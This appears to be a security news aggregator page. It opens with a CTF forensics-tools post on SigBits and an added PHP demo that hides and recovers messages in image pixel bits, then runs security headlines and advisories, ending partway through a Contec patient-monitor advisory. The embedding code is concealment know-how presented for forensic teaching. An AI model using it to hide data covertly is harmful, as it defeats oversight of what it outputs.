SigBits is a tool for analyzing the bit-level structure of files and uncovering hidden information. It is especially useful for identifying Least Significant Bit (LSB) steganography in images, as well as other types of data manipulation. SigBits provides a convenient way to inspect and manipulate the individual bits of an image, revealing hidden messages or patterns embedded in the least significant bits of color channels or other parts of the file. This makes it an excellent tool for CTF challenges focused on steganography and forensics.

Commonly used commands:

python sigBits.py -t=lsb -o=rgb -out=MyOutputFile -e=row MyInputFile.png
python sigBits.py -t=LSB -o=BGR -e=column SomeImage.jpg
python sigBits.py --type=Msb --order=GBR --extract=CoLuMn AnotherImage.png

Download links for all the tools mentioned above

To get started with the tools mentioned in this post, you can download and set them up from their official GitHub repositories. Each tool's GitHub page provides installation instructions, including dependencies and setup steps for different operating systems. Follow the provided tutorials to clone the repositories, compile the tools (if needed), and start using them for your forensic analysis tasks in CTF competitions.

GitHub: https://github.com/Masked96Artist/Forensics-Tools-for-CTF

Stay tuned for Part 2.
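As an added example (not code from the blog, nor from zsteg, Stegsolve or SigBits), the PHP below shows what LSB steganography actually does to pixel data, which is what those tools search for: it writes message bits into the lowest bit of each colour channel and reads them back in the same channel order. The pixel array is constructed in memory so the script runs without any image library; the function names are this example's own.

```php
<?php
// Added example: LSB embed/extract over an in-memory "image" (a list of
// [R, G, B] triples in row order). Not from the blog or the tools it lists.

/** Convert a string into an array of bits, most significant bit first. */
function toBits(string $data): array
{
    $bits = [];
    foreach (str_split($data) as $ch) {
        for ($i = 7; $i >= 0; $i--) {
            $bits[] = (ord($ch) >> $i) & 1;
        }
    }
    return $bits;
}

/**
 * Write $message plus a NUL terminator into the least significant bit of
 * each colour channel, channel order R,G,B, pixel by pixel. Clearing and
 * setting the LSB changes a channel value by at most 1.
 */
function lsbEmbed(array $pixels, string $message): array
{
    $bits = toBits($message . "\0");
    $total = count($bits);
    if ($total > count($pixels) * 3) {
        throw new InvalidArgumentException('message does not fit in the cover image');
    }
    $k = 0;
    foreach ($pixels as $p => $rgb) {
        foreach ([0, 1, 2] as $c) {
            if ($k === $total) {
                return $pixels;
            }
            $pixels[$p][$c] = ($rgb[$c] & 0xFE) | $bits[$k++];
        }
    }
    return $pixels;
}

/**
 * Read LSBs back in the same order, assembling bytes MSB-first, until a
 * NUL byte terminates the message. This is the bit-plane/channel walk
 * that zsteg reports as something like "b1,rgb,lsb".
 */
function lsbExtract(array $pixels): string
{
    $out = '';
    $byte = 0;
    $n = 0;
    foreach ($pixels as $rgb) {
        foreach ($rgb as $v) {
            $byte = ($byte << 1) | ($v & 1);
            if (++$n === 8) {
                if ($byte === 0) {
                    return $out;
                }
                $out .= chr($byte);
                $byte = 0;
                $n = 0;
            }
        }
    }
    return $out;
}

/** Largest per-channel difference between two same-sized pixel arrays. */
function maxChannelDelta(array $a, array $b): int
{
    $max = 0;
    foreach ($a as $p => $rgb) {
        foreach ($rgb as $c => $v) {
            $max = max($max, abs($v - $b[$p][$c]));
        }
    }
    return $max;
}

// Constructed 8x8 cover "image": a smooth gradient, 64 pixels = 192 LSBs.
$cover = [];
for ($i = 0; $i < 64; $i++) {
    $cover[] = [100 + $i, 120 + $i, 140 + $i];
}

$stego = lsbEmbed($cover, 'flag{lsb_demo}');   // 15 bytes incl. NUL = 120 bits
echo "recovered: ", lsbExtract($stego), "\n";
echo "max channel change: ", maxChannelDelta($cover, $stego), "\n";
```

Two things the script makes concrete: the cover changes by at most one unit per channel, which is why LSB payloads are invisible to the eye and why analysts look at bit planes instead; and the embedder chooses the bit plane, channel order and row/column walk, which is why zsteg and SigBits try many combinations rather than one. LSB embedding only survives lossless formats, so it is a PNG and BMP technique; a JPEG re-encode discards these bits, which is why JPEG carriers rely on tools like steghide instead.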

by HACKLIDO

Brazilian Windows users are the target of a campaign that delivers a banking malware known as Coyote. "Once deployed, the Coyote Banking Trojan can carry out various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials," Fortinet FortiGuard Labs researcher Cara Lin said in an analysis published last week. The

by The Hacker News

This blog dives into the strengths and limitations of CNAPP, explaining how a CDR solution can enhance cloud security to identify and mitigate cross-domain threats.

by Darktrace

Attack surfaces are growing faster than security teams can keep up – to stay ahead, you need to know what’s exposed and where attackers are most likely to strike. With cloud adoption dramatically increasing the ease of exposing new systems and services to the internet, prioritizing threats and managing your attack surface from an attacker’s perspective has never been more important. In this

by The Hacker News

How to Escalate XSS, Ghostty 1.1.0, Elevenlabs Scraps Job Titles, Obsidian Dynamic Tables and Collaborative Editing, World's First MIDI Shellcode, Optimize your WFH lighting.

by Hive Five

An IT pro seeks guidance on whether it’s ever acceptable to use work resources for side projects.

by ITPro Today

WhatsApp has accused professional spyware company Paragon of spying on a select group of users.

by Malwarebytes Labs

In an attack vector that's been used before, threat actors aim to commit crypto fraud by hijacking highly followed users, thus reaching a broad audience of secondary victims.

by Dark Reading

2025-02-03 15:43:00

Black Hat USA

by Dark Reading

The company is retiring the VPN tool while raising prices for Microsoft 365 Personal and Family subscriptions.

by ZDNET Security

By migrating from costly, outdated legacy systems to cloud-based solutions, healthcare organizations will experience improved scalability, security, and efficiency.

by ITPro Today

The hack has the potential to be one of the biggest of the year, but the edtech giant is refusing to answer important questions.

by TechCrunch

The release of a new Apple AirTag appears imminent for multiple reasons. Here's what we know and when you can expect it.

by ZDNET Security

2025-02-03 15:07:16

Sophos Acquires Secureworks

Transforming the future, together

by Sophos News

By integrating security into CI/CD, applying automated policies, and supporting developers with the right processes and tools, infosec teams can increase efficiency and build secure software.

by Dark Reading

For the latest discoveries in cyber research for the week of 3rd February, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Mizuno USA, giant sports equipment manufacturer, has confirmed a cyber-attack that resulted in the theft of personal information from its network between August and October 2024. The data breach included names, Social […] The post 3rd February – Threat Intelligence Report appeared first on Check Point Research.

by Check Point Research

Media and journalism companies can now build end-to-end workflows that support Content Credentials by using Cloudflare Images.

by Cloudflare

The modern corporate landscape is marked by rapid digital change, heightened cybersecurity threats and an evolving regulatory environment. At the nexus of these pressures sits the chief information security officer (CISO), a role that has gained newfound influence and responsibility. The recent Deloitte Global Future of Cyber Survey underscores this shift, revealing that “being more […] The post CISOs drive the intersection between cyber maturity and business continuity appeared first on Security Intelligence.

by Security Intelligence

Attackers are distributing the Tria stealer under the guise of wedding invitations.

by Kaspersky

Check out the January updates in Compliance Plus so you can stay on top of featured compliance training content.

by KnowBe4

French startup Riot has raised a $30 million Series B round after reaching $10 million in annual revenue in 2024. Originally focused on educating employees about cybersecurity risks, the company now wants to go one step further and nudge employees so that they minimize their attack surface. Left Lane Capital is leading Monday's round with […]

by TechCrunch

Ransomware, data theft, intrusions into critical infrastructures: attacks are on the increase in Switzerland, affecting SMEs and large organizations alike. The post ZENDATA to the rescue of hacker victims – TDG appeared first on ZENDATA Cybersecurity.

by Zendata

A Russian-speaking cybercrime gang known as Crazy Evil has been linked to over 10 active social media scams that leverage a wide range of tailored lures to deceive victims and trick them into installing malware such as StealC, Atomic macOS Stealer (aka AMOS), and Angel Drainer. "Specializing in identity fraud, cryptocurrency theft, and information-stealing malware, Crazy Evil employs a

by The Hacker News

The deal comes amid a flurry of recent merger and acquisition deals in the cybersecurity sector.

by Cybersecurity Dive

Threat actors are exploiting known weak points and enterprises’ dependency across the tech stack. It’s making cybersecurity professionals’ jobs harder than ever before. 

by Cybersecurity Dive

Understanding cybersecurity can sometimes feel like steering through a maze of technical terms and complex systems. But a recent infographic shared by @yanabantai on X (formerly Twitter) has made it simpler, offering a fresh perspective by comparing cybersecurity to the human body. This cybersecurity infographic doesn't just break down heavy technical jargon; it brings the security world to life by drawing parallels between digital protection and vital human organs.

The Human Body of Cybersecurity

Here's how the infographic cleverly outlines each critical component:

The Brain: Security Operations Center (SOC). Much like how the brain controls our actions and decisions, the SOC acts as the command center of cybersecurity, constantly monitoring, analyzing, and responding to threats in real time.

The Eyes and Ears: SIEM Systems. Security Information and Event Management (SIEM) systems function as the eyes and ears, scanning the network for irregularities and spotting potential threats early, before they can escalate.

The Heart: Data Encryption. Data encryption is the heart of cybersecurity, ensuring secure communication by protecting sensitive information during its transmission and storage, keeping everything alive and functional.

The Nervous System: Intrusion Detection System (IDS). Just as the nervous system reacts to potential threats in the body, the IDS alerts and activates responses when suspicious activity is detected, keeping the system on high alert.

The Bones: Infrastructure. Like bones provide structure to the body, cybersecurity infrastructure supports and stabilizes the entire system, ensuring it is resilient and robust against cyberattacks.

The Liver: Security Policies. Security policies work like the liver, detoxifying the network. By enforcing protocols and safe practices, they filter out harmful activities and keep the system healthy.

The Kidneys: Filtering Systems. Just as kidneys filter waste in the body, filtering systems protect sensitive data by preventing unauthorized access, ensuring only safe and clean data enters the network.

The Blood: Data Flow. Data flow is the circulation of information, much like how blood carries oxygen throughout the body. It keeps the system running smoothly and operational.

The Immune System: Antivirus Software. Antivirus software is the body's immune system, fighting off infections and malicious software before it can harm the network.

The Skin: Firewall. The firewall acts as the skin, the first line of defense against external threats. It shields the network, blocking unauthorized access and potential harm.

(Image: the infographic. Source: Bantai (X))

Why This Cybersecurity Infographic Matters

This clever analogy simplifies the complexities of cybersecurity while emphasizing the importance of a holistic approach. Just as each organ in the human body plays a vital role in maintaining health, every component in cybersecurity is essential for safeguarding digital systems. The cybersecurity infographic has generated widespread interest, with many praising its ability to make a technical subject more accessible. Next time you hear about firewalls or encryption, remember: cybersecurity is a lot like the human body, strong, resilient, and always working behind the scenes to keep us safe.

by The Cyber Express

This article discusses your options for B2B lead enrichment, touching on LinkedIn's limitations as a data source but ultimately showing why web-based data, like Hunter's, will improve your lead segmentation.

by The Hunter Blog

The Justice Department made a new move in disrupting an international network of cybercriminals by announcing the coordinated seizure of 39 cybercrime websites. These websites, associated with a Pakistan-based operation called HeartSender, were used to sell hacking tools and fraud-enabling resources to transnational organized crime groups. The action was carried out in collaboration with the Dutch National Police.

The websites seized in this operation were linked to a group headed by Saim Raza, also known by the moniker HeartSender. Raza's network has been active since at least 2020, providing malicious software and phishing toolkits that allowed cybercriminals to target victims, primarily in the United States. The group's activities led to over $3 million in victim losses, and this seizure marks an important step in disrupting their operations.

The Cybercrime Websites and Tools Sold by the HeartSender Network

The cybercrime websites operated by Saim Raza served as marketplaces for various hacking tools, including phishing kits, scam pages, and email extractors. These resources are essential for launching and maintaining fraudulent schemes, particularly business email compromise (BEC) attacks, which have become a major source of financial losses globally. The tools offered by Raza's network allowed cybercriminals to impersonate legitimate businesses and trick victims into transferring funds to accounts controlled by the perpetrators.

(Image: Authorities seizing the websites. Source: justice.gov)

The websites not only provided the tools themselves but also offered training. Raza's network took a unique approach by linking instructional YouTube videos, which demonstrated how to carry out various fraudulent activities using the tools. This made it easier for individuals with little to no technical expertise to execute complex scams. The cybercrime websites marketed these tools as "fully undetectable" by common antispam and security software, which made them highly appealing to cybercriminals looking to avoid detection.

Targeting Transnational Organized Crime Groups

The primary customers of these tools were transnational organized crime groups, who used them to facilitate a range of cybercrimes. A common scheme was business email compromise (BEC), where cybercriminals impersonate employees or vendors of a company to trick the organization into wiring large sums of money to fraudulent accounts. This type of attack often targets companies in the United States, resulting in severe financial losses.

In addition to BEC, the tools sold through these cybercrime websites were also used for identity theft, credential harvesting, and other forms of fraud. These activities have a devastating impact on victims, both financially and in terms of reputational damage. The Justice Department's efforts to seize these domains aim to disrupt the flow of these tools and prevent further damage from being caused by Raza's operation.

The Role of Law Enforcement in the Seizure

The successful seizure of these cybercrime websites was the result of close coordination between multiple law enforcement agencies. Supervisory Official Antoinette T. Bacon from the Justice Department's Criminal Division, along with U.S. Attorney Nicholas J. Ganjei from the Southern District of Texas and Special Agent in Charge Douglas Williams from the FBI Houston Field Office, announced the operation. Their collective efforts underscore the importance of international collaboration in tackling cybercrime, as Raza's network operated on a global scale.

The case is currently under investigation by the FBI Houston Field Office, with support from Dutch law enforcement agencies. The Justice Department expressed appreciation for the assistance provided by their Dutch counterparts, whose help was instrumental in executing this operation. Trial Attorney Gaelin Bernstein of the Criminal Division's Computer Crime and Intellectual Property Section, along with Assistant U.S. Attorney Rodolfo Ramirez for the Southern District of Texas, are overseeing the prosecution of the case.

Impact and Ongoing Efforts

The seizure of 39 domains associated with HeartSender's network is a major blow to the operation, but the Justice Department and its partners are committed to continuing their efforts to dismantle cybercrime networks. These websites were not only sources of hacking tools but also platforms for promoting and enabling widespread criminal activity. By disrupting these operations, the Justice Department aims to prevent further harm and send a clear message to those involved in cybercrime that their activities will not go unchecked.

As cybercrime continues to evolve, law enforcement agencies around the world must stay vigilant and collaborate across borders. The tools used by groups like HeartSender highlight the growing sophistication of cybercriminals, but also the growing resolve of law enforcement to combat these threats. The recent seizure is just one part of the larger effort to curb the rise of hacking tools and protect victims from cybercrime.

by The Cyber Express

A list of topics we covered in the week of January 27 to February 2 of 2025

by Malwarebytes Labs

Welcome to Picus Security's monthly cyber threat intelligence roundup!

by Picus Security

Authorities have successfully disrupted and dismantled the notorious online cybercrime marketplaces known as Cracked and Nulled, which had been operating since 2016. The Justice Department's involvement in this effort was part of the larger Operation Talent, a multinational initiative aimed at targeting these criminal platforms that trafficked in stolen login credentials, hacking tools, and various other illicit products.

The operation spanned across several countries, including the United States, Romania, Australia, France, Germany, Spain, Italy, and Greece. This law enforcement operation, which has led to widespread seizures of servers and domain names associated with these marketplaces, is expected to disrupt the illicit trade that has victimized millions of individuals. It is believed that at least 17 million people in the United States alone were impacted by the cybercrimes linked to these platforms.

Cracked and Nulled: A Hotbed of Cybercrime Activity

One of the primary targets of Operation Talent was Cracked, an online marketplace that had been operational since March 2018. Cracked had more than 4 million users and was involved in selling stolen login credentials, hacking tools, malware hosting services, and other cybercrime products.

(Image: Operation Talent Seizure Banner. Source: justice.gov)

Over 28 million posts were listed on the platform, with content ranging from illegal tools to sensitive stolen information. According to reports, Cracked generated approximately $4 million in revenue during its operation, primarily by trafficking in stolen data that allowed cybercriminals to launch fraudulent schemes.

A particularly disturbing example of how Cracked was used involved a case of cyberstalking and sextortion in the Western District of New York. A criminal accessed a victim's personal credentials using a product advertised on the platform, which claimed to offer access to "billions of leaked websites." This allowed the criminal to send sexually explicit and threatening messages to the victim, demonstrating just one of the numerous harmful applications of the Cracked marketplace's offerings.

To mitigate such incidents, the FBI, in cooperation with international law enforcement partners, identified and seized servers and domain names associated with the Cracked infrastructure. This operation, including the takedown of servers used for payment processing through Sellix and related hosting services, was a direct hit at the heart of the platform's operations. Law enforcement officials now expect that anyone trying to access the seized domains will encounter a law enforcement seizure banner, alerting them to the legal actions taken.

Nulled Marketplace: A Parallel Operation

Simultaneously, the U.S. Justice Department also announced the seizure of the Nulled marketplace domain and revealed criminal charges against Lucas Sohn, one of its key administrators. Nulled had been active since 2016, with over 5 million users and more than 43 million posts related to cybercrime products and services. Similar to Cracked, the platform was responsible for selling stolen login credentials, personal identification documents, and hacking tools. The marketplace reportedly generated around $1 million annually, enabling criminals to further their activities with ease.

A particularly concerning item that was sold through Nulled was a database containing the names and social security numbers of 500,000 U.S. citizens, highlighting the scale of identity theft facilitated by the platform. Lucas Sohn, a 29-year-old Argentinian residing in Spain, acted as a key administrator for Nulled, processing transactions and acting as an intermediary for users engaged in cybercrime activities. Sohn faces several charges, including conspiracy to traffic in passwords, identity fraud, and access device fraud. If convicted, he could face lengthy prison sentences.

The Global Nature of the Cybercrime Threat

This operation exemplifies the collaborative efforts between international law enforcement agencies in addressing the growing issue of cybercrime. Investigators from multiple countries, including the Australian Federal Police, France's Anti-Cybercrime Office, Germany's Federal Criminal Police Office, and the Spanish National Police, among others, joined forces with the FBI to disrupt the Cracked and Nulled marketplaces.

With the seizures of critical cybercrime infrastructure and the arrests of key figures involved in these online marketplaces, authorities have taken a step toward curbing the global trade in stolen data and hacking tools. The operation not only highlights the widespread use of such platforms in criminal enterprises but also demonstrates the ongoing international commitment to combat online cybercrime.

The Justice Department, along with its law enforcement partners, has sent a clear message to cybercriminals operating in the dark corners of the internet: they are not beyond reach. The takedown of Cracked and Nulled serves as a powerful reminder of the risks associated with engaging in illegal activities within online cybercrime marketplaces. With the help of operations like Operation Talent, authorities are sending a warning to others who may attempt to exploit similar platforms for criminal purposes.

by The Cyber Express

This vulnerability allows local attackers to escalate privileges on affected installations of TeamViewer. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-0065.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of NI Vision Builder AI. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12740.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of NI Vision Development Module. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12740.

by Zero Day Initiative Advisories

This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.7. The following CVEs are assigned: CVE-2024-9632.

by Zero Day Initiative Advisories

This post first appeared on blog.netwrix.com and was written by Jonathan Blackwell. Introduction to PowerShell Regex: A regular expression (regex) is a sequence of characters that defines a pattern or template, such as the format of email addresses or Social Security numbers. Regular expressions are useful for pattern matching and text manipulation. For example, regex can help you quickly find all failed login attempts in a server … Continued

by Netwrix

The Red Siege train is heading to Denver, Colorado, for the first-ever Wild West Hackin’ Fest @ Mile High from February 5-7, 2025! If you’re a cybersecurity professional who loves […]

by Red Siege Blog

U.S. senator says Musk's access to Treasury systems represents a "national security risk." © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

U.S. and Dutch law enforcement agencies have announced that they have dismantled 39 domains and their associated servers as part of efforts to disrupt a network of online marketplaces originating from Pakistan. The action, which took place on January 29, 2025, has been codenamed Operation Heart Blocker. The vast array of sites in question peddled phishing toolkits and fraud-enabling tools and

by The Hacker News

BeyondTrust has revealed it completed an investigation into a recent cybersecurity incident that targeted some of the company's Remote Support SaaS instances by making use of a compromised API key. The company said the breach involved 17 Remote Support SaaS customers and that the API key was used to enable unauthorized access by resetting local application passwords. The breach was first flagged

by The Hacker News

Plus: WhatsApp discloses nearly 100 targets of spyware, hackers used the AT&T breach to hunt for details on US politicians, and more.

by WIRED Security News

Meta-owned WhatsApp on Friday said it disrupted a campaign that involved the use of spyware to target journalists and civil society members. The campaign, which targeted around 90 members, involved the use of spyware from an Israeli company known as Paragon Solutions. The attackers were neutralized in December 2024. In a statement to The Guardian, the encrypted messaging app said it has reached

by The Hacker News

Cybersecurity researchers have discovered a malvertising campaign that's targeting Microsoft advertisers with bogus Google ads that aim to take them to phishing pages that are capable of harvesting their credentials. "These malicious ads, appearing on Google Search, are designed to steal the login information of users trying to access Microsoft's advertising platform," Jérôme Segura, senior

by The Hacker News

Social engineering methods are being put to the test to distribute malware.

by Malwarebytes Labs

Now we know exactly how DeepSeek was designed to work, and we may even have a clue toward its highly publicized scandal with OpenAI.

by Dark Reading

Check out all the highlights from Black Hat USA 2024 at the Mandalay Bay in Las Vegas. #cybersecurity #infosec #blackhat

by Dark Reading

The CHC remains operational, but a host of personal data is now in the hands of a "skilled cybercriminal," it said.

by Dark Reading

The "Cracked" and "Nulled" Dark Web sites are now offline, along with the Pakistani "Saim Raza" network of underground forums (aka HeartSender).

by Dark Reading

In one security firm's test, the chatbot alluded to using OpenAI's training data.

by ZDNET Security

Cyble dark web researchers have identified a new pro-Russian hacktivist group that's been hacking into oil and gas facility control panels in the U.S. Cyble detailed two claims by the new "Sector 16" group that members hacked into control panels in energy facilities and tampered with system control settings. The new Russian threat group has been working with another pro-Russian group, Z-Pentest, which has been hacking into critical water and energy infrastructure since last year.

Dramatic Videos Detail Control Panel Hacks

Like Z-Pentest, Sector 16 has been posting screen recordings of its exploits to underground forums and channels, continuing a trend of Russian hacktivists posting videos of their members tampering with critical infrastructure control panels. Cyble speculated that the videos may be "more to establish credibility or threaten than to inflict actual damage, although in one case Z-Pentest claimed to disrupt a U.S. oil well system."

In one incident, Sector 16 teamed with Z-Pentest to hack into a supervisory control and data acquisition (SCADA) system managing oil pumps and storage tanks in Texas. The groups posted a video showing the system interface, including real-time data on tank levels, pump pressures, casing pressures, and alarm management features. The logos of both groups were embedded into the video, suggesting a close alliance between the two groups, Cyble said (image below).

(Image: Sector 16 and Z-Pentest control panel hack. Source: Cyble)

Sector 16 later claimed sole responsibility for hacking into the control systems of a U.S. oil and gas production facility, and released a video "purportedly demonstrating their access to the facility's operational data and systems," Cyble said. The video showed "control interfaces associated with the monitoring and management of critical infrastructure," the Cyble report said. The system controls included shutdown management, production monitoring, tank level readings, gas lift operations, and Lease Automatic Custody Transfer (LACT) data, "all critical components in the facility's operations. Additionally, they were also able to access valve control interfaces, pressure monitoring, and flow measurement data, highlighting the potential extent of access."

U.S. cybersecurity officials have been concerned about critical infrastructure threats from adversaries like Russia and China, but critical sectors like energy, healthcare and transportation remain vulnerable to attack.

Pro-Islamic Groups Launch DDoS Attacks on U.S. Government

Cyble also examined claims of DDoS attacks on the U.S. government by pro-Islamic hacktivists like Mr. Hamza, which united with Z-Pentest and other pro-Russian groups in European attacks in December. Mr. Hamza teamed with Velvet Team in DDoS attacks on U.S. government and military platforms, Cyble said, noting that targeted systems included a U.S. Army development and communications network, an FBI portal for bank robbery information, and the United States Africa Command's official platform.

Such motivated threat groups, willing to work across ideological lines to advance their goals, pose substantial risks to critical infrastructure in dire need of stronger cybersecurity protections. The Cyble dark web report also detailed recent ransomware and data breach claims made by threat actors.

by The Cyber Express

Regulators are ready to enforce new state data privacy laws. Here's how experts say organizations can stay compliant and avoid penalties.

by Dark Reading

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Food and Drug Administration (FDA) have issued alerts about the presence of hidden functionality in Contec CMS8000 patient monitors and Epsimed MN-120 patient monitors. The vulnerability, tracked as CVE-2025-0626, carries a CVSS v4 score of 7.7 on a scale of 10.0. The flaw, alongside two other issues, was reported to CISA

by The Hacker News

The FBI and authorities in The Netherlands this week seized a number of servers and domains for a hugely popular spam and malware dissemination service operating out of Pakistan. The proprietors of the service, who use the collective nickname "The Manipulaters," have been the subject of three stories published here since 2015. The FBI said the main clientele are organized crime groups that try to trick victim companies into making payments to a third party.

by Krebs on Security

The deal, expected to close this quarter, will give Tenable One Exposure Management much-needed integration with over 100 third-party security tools and platforms.

by Dark Reading

Security researchers tested 50 well-known jailbreaks against DeepSeek’s popular new AI chatbot. It didn’t stop a single one.

by WIRED Security News

Nine application security toolmakers band together to fork the popular Semgrep code-scanning project, touching off a controversy over access to features and fairness.

by Dark Reading

The biggest and most high-profile ransomware incidents of 2024, and the consequences for targeted organizations.

by Kaspersky

Securing sprawling web application and API environments can be a constant game of whack-a-mole. To know and control their realistic attack surface, security teams need a way to find and test everything that’s running—and do it consistently, as often as they need. That’s why a DAST-based application security platform is fast becoming the CISO’s tool of choice. The post Is DAST only for web applications? A fact-check on vulnerability scanning appeared first on Invicti.

by Invicti

As part of our ongoing mission to identify emerging threats to mobile security, our zLabs team shares how we can help protect you against Tria Stealer. The post Zimperium’s Protection Against Tria Stealer’s SMS Data Theft appeared first on Zimperium.

by Zimperium

Law enforcement took down several cybercrime forums that sold tools and data to other cybercriminals

by Malwarebytes Labs

Russia has a long history of targeting platforms, and aimed its restrictions at the most popular video-sharing platform in the country. The post How Russia throttled YouTube for domestic audiences appeared first on DFRLab.

by DFRLab

Social engineering has long been an effective tactic because of how it focuses on human vulnerabilities. There’s no brute-force ‘spray and pray’ password guessing. No scouring systems for unpatched software. Instead, it simply relies on manipulating emotions such as trust, fear, and respect for authority, usually with the goal of gaining access to sensitive information or protected systems.

by The Hacker News

In recognition of Change Your Password Day, Keeper Security is urging organisations to prioritise securing credentials to combat the escalating threat of cyber attacks. Without proper safeguards, compromised credentials can lead to devastating breaches, financial loss and reputational damage. Privileged accounts, often used by administrators or automated systems to access critical infrastructure, are prime targets for […] The post Change Your Password Day: Keeper Security Highlights Urgent Need for Strong Credential Management appeared first on IT Security Guru.

by IT Security Guru

Italy's data protection watchdog has blocked Chinese artificial intelligence (AI) firm DeepSeek's service within the country, citing a lack of information on its use of users' personal data. The development comes days after the authority, the Garante, sent a series of questions to DeepSeek, asking about its data handling practices and where it obtained its training data. In particular, it wanted

by The Hacker News

Google said it blocked over 2.36 million policy-violating Android apps from being published to the Google Play app marketplace in 2024 and banned more than 158,000 bad developer accounts that attempted to publish such harmful apps. The tech giant also noted it prevented 1.3 million apps from getting excessive or unnecessary access to sensitive user data during the time period by working with

by The Hacker News

Hackers are increasingly abusing bugs in popular enterprise software to target big companies in mass-hacking campaigns © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Did you know that 48% of the digital identities you are managing belong to individuals external to your organisation, such as partners or suppliers? As businesses rely more on networks of third-party partners, managing their access needs becomes essential. Allowing partners to access company resources introduces complexities and risks, making it vital for security leaders […] The post Third-party Delegation: Striking the Balance Between Risk, Trust, and Control appeared first on IT Security Guru.

by IT Security Guru

Organizations struggle with unpredictable cloud spending, but improved data visibility, cost management, and long-term forecasting can turn cloud financials into a strategic asset for optimizing IT investments.

by ITPro Today

India's Tata Technologies has disclosed a ransomware attack affecting its IT assets. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

The Meta-owned company said the campaign was linked to Israeli spyware maker Paragon. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

The Cyber Trust Mark has the potential to change how we define and measure security at the endpoint level. But potential isn't enough.

by Dark Reading

“A computer can never be held accountable, therefore a computer must never make a management decision.” – IBM Training Manual, 1979 Artificial intelligence (AI) adoption is on the rise. According to the IBM Global AI Adoption Index 2023, 42% of enterprises have actively deployed AI, and 40% are experimenting with the technology. Of those using […] The post AI decision-making: Where do businesses draw the line? appeared first on Security Intelligence.

by Security Intelligence

This glossary includes the most common terms and expressions TechCrunch uses in our security reporting, and explanations of how — and why — we use them. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Ever wondered if your organization is truly secure or if your teams are just crossing items off a checklist? A Security Posture Review (SPR) is a solid way to answer […]

by Red Siege Blog

On the crisp morning of December 13th, 2024, as the clock struck 09:59 CET, anticipation filled the air. Around the world, over 200 hackers from 100 teams were gearing up for Outpost24’s annual Capture the Flag (CTF) event, aptly named “json returns“. Participants performed their final checkups, opened cans of energy drinks, and stretched their […] The post Outpost24’s Capture the Flag event recap: “json returns” appeared first on Outpost24.

by Outpost24

Check out the 25 new pieces of training content added in January, alongside the always fresh content update highlights, new features and events. 

by KnowBe4

by ComputerWeekly

Apple's trackers have been misused to track some people without their consent. Here's how to check if an AirTag is tracking you, whether you use an iPhone or Android phone. Plus, what to do next if you find one.

by ZDNET Security

Watch this tutorial to learn how to use Lynis, an open source security auditing tool, to audit and enhance Linux security.

by ITPro Today

A study from IBM shows the controversial shift to platformization can pay off for enterprises. 

by Cybersecurity Dive

Broadcom has released security updates to patch five security flaws impacting VMware Aria Operations and Aria Operations for Logs, warning customers that attackers could exploit them to gain elevated access or obtain sensitive information. The list of identified flaws, which impact versions 8.x of the software, is below - CVE-2025-22218 (CVSS score: 8.5) - A malicious actor with View Only Admin

by The Hacker News

A new set of critical vulnerabilities has been identified in Contec Health's CMS8000 Patient Monitor, posing significant cybersecurity and patient safety risks. These vulnerabilities, which have received a CVSS v4 base score of 9.3, allow for remote exploitation with low attack complexity. The security issues identified include an Out-of-Bounds Write vulnerability, a Hidden Functionality (Backdoor), and Privacy Leakage. These flaws could lead to remote code execution, unauthorized file uploads, and exposure of sensitive patient data. Both the Cybersecurity and Infrastructure Security Agency (CISA) and the Food and Drug Administration (FDA) have issued safety communications addressing these risks, highlighting the potential for large-scale exploitation in healthcare environments.

Background

Critical Infrastructure Sector: Healthcare and Public Health
Global Deployment: The CMS8000 Patient Monitor is used worldwide.
Manufacturer: Contec Health, headquartered in China.
Researcher: An anonymous security researcher reported these vulnerabilities to CISA.

Risk Evaluation

Successful exploitation of these vulnerabilities can enable a malicious actor to remotely send specially crafted UDP requests, allowing them to write arbitrary data. This could result in remote code execution, unauthorized access to patient information, and even the ability to manipulate device functionality. Moreover, the device has been found to leak patient and sensor data to an unknown external network, further exacerbating security concerns.

A particularly troubling aspect of these vulnerabilities is that simultaneous exploitation of all affected devices within a shared network is possible. This increases the risk of coordinated cyberattacks that could compromise multiple patient monitors in a single healthcare facility. To mitigate these risks, both the FDA and CISA have released guidelines and fact sheets detailing the vulnerabilities and recommended security measures.

Technical Details

Affected Products

The vulnerabilities affect the following firmware versions of the CMS8000 Patient Monitor:
smart3250-2.6.27-wlan2.1.7.cramfs
CMS7.820.075.08/0.74(0.75)
CMS7.820.120.01/0.93(0.95)
All firmware versions (CVE-2025-0626, CVE-2025-0683)

Vulnerabilities Overview

1. Out-of-Bounds Write (CWE-787), CVE-2024-12248
Allows an attacker to send specially formatted UDP requests that write arbitrary data, potentially leading to remote code execution.
CVSS v3.1 Base Score: 9.8; CVSS v4 Base Score: 9.3

2. Hidden Functionality (Backdoor) (CWE-912), CVE-2025-0626
The device sends remote access requests to a hard-coded IP address, bypassing network settings. This could allow unauthorized actors to upload and overwrite files on the monitor.
CVSS v3.1 Base Score: 7.5; CVSS v4 Base Score: 7.7

3. Privacy Leakage (CWE-359), CVE-2025-0683
In the default configuration, the monitor transmits plain-text patient data to a hard-coded public IP address, leading to potential exposure of confidential information.
CVSS v3.1 Base Score: 5.9; CVSS v4 Base Score: 8.2

Mitigation Measures

